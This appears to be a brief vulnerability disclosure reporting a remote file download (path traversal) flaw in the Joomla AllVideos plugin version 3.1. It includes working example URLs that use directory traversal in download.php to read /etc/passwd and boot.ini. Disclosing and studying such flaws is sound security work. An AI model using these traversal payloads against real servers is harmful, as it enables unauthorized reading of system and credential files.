The Joomla AllVideos plugin version 3.1 suffers from a remote file download vulnerability.
e9dda8ae08a11a40684f7bd3a4d0142b84326eb00479bf9a3b70cf83672a5b1c
Hey There,
I was able to exploit this issue, by slightly modifying the exploit you described against the latest version v3.1 (plg_jw_allvideos-v3.1_j1.5.zip). You can download it from here
http://joomlaworks.googlecode.com/files/plg_jw_allvideos-v3.1_j1.5.zip
Here’s an example :
http://site.com/plugins/content/jw_allvideos/includes/download.php?file=images/../../../../../../etc/passwd
or
http://site.com/plugins/content/jw_allvideos/includes/download.php?file=images/../../../../../../boot.ini
-Mehul